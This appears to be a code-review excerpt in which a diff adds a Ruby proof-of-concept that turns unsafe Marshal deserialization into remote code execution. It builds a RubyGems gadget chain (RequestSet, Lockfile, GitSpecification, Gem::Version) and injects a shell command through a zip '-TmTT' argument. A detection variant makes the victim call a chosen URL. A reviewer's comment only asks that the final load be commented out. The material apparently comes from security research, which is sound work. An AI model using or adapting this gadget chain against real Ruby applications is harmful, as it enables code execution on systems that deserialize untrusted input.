marshal/3.4-rc/marshal-rce-ruby-3.4-rc.rb

```diff
@@ -0,0 +1,124 @@
+  git_source.instance_variable_set("@git", executable)
+  git_source.instance_variable_set("@reference", second_param)
+  git_source.instance_variable_set("@root_dir", "/tmp")
+  git_source.instance_variable_set("@repository", "any")
+  git_source.instance_variable_set("@name", "any")
+
+  spec = Gem::Resolver::Specification.allocate
+  spec.instance_variable_set("@name", "any")
+  spec.instance_variable_set("@dependencies",[])
+
+  git_spec = Gem::Resolver::GitSpecification.allocate
+  git_spec.instance_variable_set("@source", git_source)
+  git_spec.instance_variable_set("@spec", spec)
+
+  spec_specification = Gem::Resolver::SpecSpecification.allocate
+  spec_specification.instance_variable_set("@spec", git_spec)
+
+  return spec_specification
+end
+
+def command_gadget(zip_param_to_execute)
+  git_gadget_create_zip = git_gadget("zip", "/etc/passwd")
+  git_gadget_execute_cmd = git_gadget("zip", zip_param_to_execute)
+
+  request_set = Gem::RequestSet.allocate
+  request_set.instance_variable_set("@sorted_requests", [git_gadget_create_zip, git_gadget_execute_cmd])
+
+  lockfile = Gem::RequestSet::Lockfile.new('','','')
+  lockfile.instance_variable_set("@set", request_set)
+  lockfile.instance_variable_set("@dependencies",[])
+
+  return lockfile
+end
+
+
+# This is the major change compared to the other gadget.
+# Essentially the Gem::Specification is calling safe_load which blocks the execution of the chain.
+# Since we need a gadget that calls to_s from (marshal)_load, i've opted for Gem::Version
+# The only problem with this is the fact that it throws an error, hence two separate load are required.
+def to_s_wrapper(inner)
+  spec = Gem::Version.allocate
+  spec.instance_variable_set("@version", inner)
+  # spec = Gem::Specification.new
+  # spec.instance_variable_set("@new_platform", inner)
+  return spec
+end
+
+# RCE
+def create_rce_gadget_chain(zip_param_to_execute)
+  exec_gadget = command_gadget(zip_param_to_execute)
+
+  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(exec_gadget)])
+end
+
+# detection / folder creation
+def create_detection_gadget_chain(url)
+  call_url_gadget = call_url_and_create_folder(url)
+
+  return Marshal.dump([Gem::SpecFetcher, to_s_wrapper(call_url_gadget)])
+end
+
+url =  "rubygems.org/quick/Marshal.4.8/bundler-2.2.27.gemspec.rz" # replace with URL to call in the detection gadget, for example: test.example.org/path, url should not have a query (?) component.
+detection_gadget_chain = create_detection_gadget_chain(url)
+
+begin
+  Marshal.load(detection_gadget_chain)
+  rescue
+end
+
+puts detection_gadget_chain.unpack("H*")
+
+# You can comment from here if you want to simply detect the presence of the vulnerability.
+zip_param_to_execute = "-TmTT=\"$(id>/tmp/marshal-poc)\"any.zip" # replace with -TmTT=\"$(id>/tmp/marshal-poc)\"any.zip
+rce_gadget_chain = create_rce_gadget_chain(zip_param_to_execute)
+
+puts rce_gadget_chain.unpack("H*")
+
+Marshal.load(rce_gadget_chain)
```

Comment:
```suggestion
#Marshal.load(rce_gadget_chain)
```

I prefer not immediately loading the gadget here (see [also](https://github.com/GitHubSecurityLab/ruby-unsafe-deserialization/blob/440261ed6f24d3d5a7a6620099bbd765c0a24b2d/marshal/3.2.4/marshal-rce-ruby-3.2.4.rb#L103)).